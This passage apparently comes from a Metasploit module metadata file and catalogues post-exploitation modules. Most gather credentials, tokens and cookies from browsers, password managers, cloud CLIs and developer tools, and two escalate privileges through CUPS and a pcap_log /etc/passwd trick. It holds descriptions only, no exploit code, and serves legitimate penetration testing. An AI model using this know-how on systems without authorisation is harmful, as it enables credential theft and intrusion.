"post/multi/escalate/cups_root_file_read", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-20", + "type": "post", + "author": [ + "Jann Horn", + "joev " + ], + "description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n CUPS allows members of the lpadmin 
group to make changes to the cupsd.conf\n configuration, which can specify an Error Log path. When the user visits the\n Error Log page in the web interface, the cupsd daemon (running with setuid root)\n reads the Error Log path and echoes it as plaintext.\n\n This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n as long as the session is in the lpadmin group.\n\n Warning: if the user has set up a custom path to the CUPS error log,\n this module might fail to reset that path correctly. You can specify\n a custom error log path with the ERROR_LOG datastore option.", + "references": [ + "CVE-2012-5519", + "OSVDB-87635", + "URL-https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791" + ], + "platform": "Linux,OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/escalate/cups_root_file_read.rb", + "is_install_path": true, + "ref_name": "multi/escalate/cups_root_file_read", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/escalate/metasploit_pcaplog": { + "name": "Multi Escalate Metasploit pcap_log Local Privilege Escalation", + "fullname": "post/multi/escalate/metasploit_pcaplog", + "aliases": [], + "rank": 0, + "disclosure_date": "2012-07-16", + "type": "post", + "author": [ + "0a29406d9794e4f9b30b3c5d6702c708" + ], + "description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n creates pcap files in /tmp with predictable file names. 
This exploits this by hard-linking these\n filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n This, and all the other packets, are appended to /etc/passwd.\n\n Successful exploitation results in the creation of a new superuser account.\n\n This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n a permanent DoS on the target by corrupting the /etc/passwd file.", + "references": [ + "BID-54472", + "URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html", + "URL-https://community.rapid7.com/docs/DOC-1946" + ], + "platform": "BSD,Linux,Unix", + "arch": "", + "rport": 2940, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/escalate/metasploit_pcaplog.rb", + "is_install_path": true, + "ref_name": "multi/escalate/metasploit_pcaplog", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/apple_ios_backup": { + "name": "Windows Gather Apple iOS MobileSync Backup File Collection", + "fullname": "post/multi/gather/apple_ios_backup", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "hdm ", + "bannedit " + ], + "description": "This module will collect sensitive files from any on-disk iOS device backups", + "references": [], + "platform": "OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": 
"/modules/post/multi/gather/apple_ios_backup.rb", + "is_install_path": true, + "ref_name": "multi/gather/apple_ios_backup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/aws_ec2_instance_metadata": { + "name": "Gather AWS EC2 Instance Metadata", + "fullname": "post/multi/gather/aws_ec2_instance_metadata", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "This module will attempt to connect to the AWS EC2 instance metadata service\n and crawl and collect all metadata known about the session'd host.", + "references": [ + "URL-http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" + ], + "platform": "Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb", + "is_install_path": true, + "ref_name": "multi/gather/aws_ec2_instance_metadata", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/aws_keys": { + "name": "UNIX Gather AWS Keys", + "fullname": "post/multi/gather/aws_keys", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "This module will attempt to read AWS configuration files\n (.aws/config, .aws//credentials and .s3cfg) for users discovered\n on the session'd system and extract AWS keys from within.", + "references": [ + 
"URL-http://s3tools.org/kb/item14.htm", + "URL-http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-config-files" + ], + "platform": "BSD,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/aws_keys.rb", + "is_install_path": true, + "ref_name": "multi/gather/aws_keys", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/azure_cli_creds": { + "name": "Azure CLI Credentials Gatherer", + "fullname": "post/multi/gather/azure_cli_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "James Otten ", + "h00die" + ], + "description": "This module will collect the Azure CLI 2.0+ (az cli) settings files\n for all users on a given target. 
These configuration files contain\n JWT tokens used to authenticate users and other subscription information.\n Once tokens are stolen from one host, they can be used to impersonate\n the user from a different host.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-06-27 10:45:05 +0000", + "path": "/modules/post/multi/gather/azure_cli_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/azure_cli_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/check_malware": { + "name": "Multi Gather Malware Verifier", + "fullname": "post/multi/gather/check_malware", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will check a file for malware on VirusTotal based on the checksum.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/check_malware.rb", + "is_install_path": true, + "ref_name": "multi/gather/check_malware", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/chrome_cookies": { + "name": "Chrome Gather Cookies", + "fullname": "post/multi/gather/chrome_cookies", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mangopdf " + ], + 
"description": "Read all cookies from the Default Chrome profile of the target user.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/chrome_cookies.rb", + "is_install_path": true, + "ref_name": "multi/gather/chrome_cookies", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dbeaver": { + "name": "Gather Dbeaver Passwords", + "fullname": "post/multi/gather/dbeaver", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + "description": "This module will determine if Dbeaver is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. 
The passwords for these saved sessions will then be decrypted\n where possible.", + "references": [ + "URL-https://blog.kali-team.cn/Metasploit-dbeaver-9f42e26241c94ba785dce5f1e69697aa" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/dbeaver.rb", + "is_install_path": true, + "ref_name": "multi/gather/dbeaver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dbvis_enum": { + "name": "Multi Gather DbVisualizer Connections Settings", + "fullname": "post/multi/gather/dbvis_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "David Bloom" + ], + "description": "DbVisualizer stores the user database configuration in dbvis.xml.\n This module retrieves the connections settings from this file and decrypts the encrypted passwords.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/dbvis_enum.rb", + "is_install_path": true, + "ref_name": "multi/gather/dbvis_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dns_bruteforce": { + "name": "Multi Gather DNS Forward Lookup Bruteforce", + "fullname": "post/multi/gather/dns_bruteforce", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Brute force subdomains and hostnames via wordlist.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/dns_bruteforce.rb", + "is_install_path": true, + "ref_name": "multi/gather/dns_bruteforce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dns_reverse_lookup": { + "name": "Multi Gather DNS Reverse Lookup Scan", + "fullname": "post/multi/gather/dns_reverse_lookup", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Performs DNS reverse lookup using the OS included DNS query command.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/dns_reverse_lookup.rb", + "is_install_path": true, + "ref_name": "multi/gather/dns_reverse_lookup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dns_srv_lookup": { + "name": "Multi Gather DNS Service Record Lookup Scan", + "fullname": "post/multi/gather/dns_srv_lookup", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + 
], + "description": "Enumerates known SRV Records for a given domain using target host DNS query tool.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/dns_srv_lookup.rb", + "is_install_path": true, + "ref_name": "multi/gather/dns_srv_lookup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/docker_creds": { + "name": "Multi Gather Docker Credentials Collection", + "fullname": "post/multi/gather/docker_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Flibustier" + ], + "description": "This module will collect the contents of all users' .docker directories on the targeted\n machine. 
If the user has already push to docker hub, chances are that the password was\n saved in base64 (default behavior).", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/docker_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/docker_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/electerm": { + "name": "Gather electerm Passwords", + "fullname": "post/multi/gather/electerm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + "description": "This module will determine if electerm is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. 
The passwords for these saved sessions will then be decrypted\n where possible.", + "references": [ + "URL-https://blog.kali-team.cn/metasploit-electerm-6854f3d868eb45eab6951acc463a910d" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/electerm.rb", + "is_install_path": true, + "ref_name": "multi/gather/electerm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/enum_hexchat": { + "name": "Linux Gather HexChat/XChat Enumeration", + "fullname": "post/multi/gather/enum_hexchat", + "aliases": [ + "post/linux/gather/enum_xchat" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r ", + "h00die" + ], + "description": "This module will collect HexChat and XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. 
The CHATS option will simply download all the\n .log files.", + "references": [ + "URL-https://hexchat.readthedocs.io/en/latest/settings.html" + ], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/gather/enum_hexchat.rb", + "is_install_path": true, + "ref_name": "multi/gather/enum_hexchat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ALL", + "description": "Collect both the configs and chat logs" + }, + { + "name": "CHATS", + "description": "Collect chat logs with a pattern" + }, + { + "name": "CONFIGS", + "description": "Collect config files" + } + ] + }, + "post_multi/gather/enum_software_versions": { + "name": "Multiplatform Installed Software Version Enumerator", + "fullname": "post/multi/gather/enum_software_versions", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "gwillcox-r7" + ], + "description": "This module, when run against a compromised machine, will gather details on all installed software,\n including their versions and if available, when they were installed, and will save it into a loot file for later use.\n Users can then use this loot file to determine what additional vulnerabilites may affect the target machine.\n\n Note that for Linux systems, software enumeration is done via package managers. 
As a result the results may\n not reflect all of the available software on the system simply because users may have installed additional\n software from alternative sources such as source code that these package managers are not aware of.", + "references": [], + "platform": "Android,BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/gather/enum_software_versions.rb", + "is_install_path": true, + "ref_name": "multi/gather/enum_software_versions", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/enum_vbox": { + "name": "Multi Gather VirtualBox VM Enumeration", + "fullname": "post/multi/gather/enum_vbox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n Due to the nature of VirtualBox, this module can only enumerate VMs registered\n for the current user, therefore, this module needs to be invoked from a user context.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/enum_vbox.rb", + "is_install_path": true, + "ref_name": "multi/gather/enum_vbox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + 
"actions": [] + }, + "post_multi/gather/env": { + "name": "Multi Gather Generic Operating System Environment Settings", + "fullname": "post/multi/gather/env", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "egypt " + ], + "description": "This module prints out the operating system environment variables.", + "references": [], + "platform": "Linux,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-01 13:37:15 +0000", + "path": "/modules/post/multi/gather/env.rb", + "is_install_path": true, + "ref_name": "multi/gather/env", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "powershell", + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/fetchmailrc_creds": { + "name": "UNIX Gather .fetchmailrc Credentials", + "fullname": "post/multi/gather/fetchmailrc_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post Module to obtain credentials saved for IMAP, POP and other mail\n retrieval protocols in fetchmail's .fetchmailrc", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/fetchmailrc_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/fetchmailrc_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + 
"post_multi/gather/filezilla_client_cred": { + "name": "Multi Gather FileZilla FTP Client Credential Collection", + "fullname": "post/multi/gather/filezilla_client_cred", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit ", + "Carlos Perez " + ], + "description": "This module will collect credentials from the FileZilla FTP client if it is installed.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/filezilla_client_cred.rb", + "is_install_path": true, + "ref_name": "multi/gather/filezilla_client_cred", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/find_vmx": { + "name": "Multi Gather VMWare VM Identification", + "fullname": "post/multi/gather/find_vmx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module will attempt to find any VMWare virtual machines stored on the target.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/find_vmx.rb", + "is_install_path": true, + "ref_name": "multi/gather/find_vmx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + 
"post_multi/gather/firefox_creds": { + "name": "Multi Gather Firefox Signon Credential Collection", + "fullname": "post/multi/gather/firefox_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit ", + "xard4s", + "g0tmi1k" + ], + "description": "This module will collect credentials from the Firefox web browser if it is\n installed on the targeted machine. Additionally, cookies are downloaded. Which\n could potentially yield valid web sessions.\n\n Firefox stores passwords within the signons.sqlite database file. There is also a\n keys3.db file which contains the key for decrypting these passwords. In cases where\n a Master Password has not been set, the passwords can easily be decrypted using\n 3rd party tools or by setting the DECRYPT option to true. Using the latter often\n needs root privileges. Also be warned that if your session dies in the middle of the\n file renaming process, this could leave Firefox in a non working state. 
If a\n Master Password was used the only option would be to bruteforce.\n\n Useful 3rd party tools:\n + firefox_decrypt (https://github.com/Unode/firefox_decrypt)\n + pswRecovery4Moz (https://github.com/philsmd/pswRecovery4Moz)", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/firefox_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/firefox_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/gpg_creds": { + "name": "Multi Gather GnuPG Credentials Collection", + "fullname": "post/multi/gather/gpg_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Dhiru Kholia ", + "Henry Hoggard" + ], + "description": "This module will collect the contents of all users' .gnupg directories on the targeted\n machine. 
Password protected secret keyrings can be cracked with John the Ripper (JtR).", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/gpg_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/gpg_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/grub_creds": { + "name": "Gather GRUB Password", + "fullname": "post/multi/gather/grub_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Garvit Dewan ", + "Taeber Rapczak ", + "Shelby Pace" + ], + "description": "This module gathers GRUB passwords from GRUB bootloader config files.", + "references": [ + "URL-https://help.ubuntu.com/community/Grub2/Passwords#Password_Encryption" + ], + "platform": "BSD,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/grub_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/grub_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/irssi_creds": { + "name": "Multi Gather IRSSI IRC Password(s)", + "fullname": "post/multi/gather/irssi_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jonathan Claudius " + ], + "description": "This module 
grabs IRSSI IRC credentials.", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/irssi_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/irssi_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/jboss_gather": { + "name": "JBoss Credential Collector", + "fullname": "post/multi/gather/jboss_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Koen Riepe (koen.riepe " + ], + "description": "This module can be used to extract the JBoss admin passwords for version 4, 5 and 6.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/jboss_gather.rb", + "is_install_path": true, + "ref_name": "multi/gather/jboss_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/jenkins_gather": { + "name": "Jenkins Credential Collector", + "fullname": "post/multi/gather/jenkins_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "thesubtlety" + ], + "description": "This module can be used to extract saved Jenkins credentials, user\n tokens, SSH keys, and secrets. 
Interesting files will be stored in\n loot along with combined csv output.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/jenkins_gather.rb", + "is_install_path": true, + "ref_name": "multi/gather/jenkins_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/lastpass_creds": { + "name": "LastPass Vault Decryptor", + "fullname": "post/multi/gather/lastpass_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Garcia Illera ", + "Martin Vigo ", + "Jon Hart " + ], + "description": "This module extracts and decrypts LastPass master login accounts and passwords,\n encryption keys, 2FA tokens and all the vault passwords", + "references": [ + "URL-http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/lastpass_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/lastpass_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/maven_creds": { + "name": "Multi Gather Maven Credentials Collection", + "fullname": "post/multi/gather/maven_creds", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "post", + "author": [ + "elenoir" + ], + "description": "This module will collect the contents of all users settings.xml on the targeted\n machine.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/maven_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/maven_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/memory_search": { + "name": "Memory Search", + "fullname": "post/multi/gather/memory_search", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sjanusz-r7" + ], + "description": "This module allows for searching the memory space of running processes for\n potentially sensitive data such as passwords.", + "references": [], + "platform": 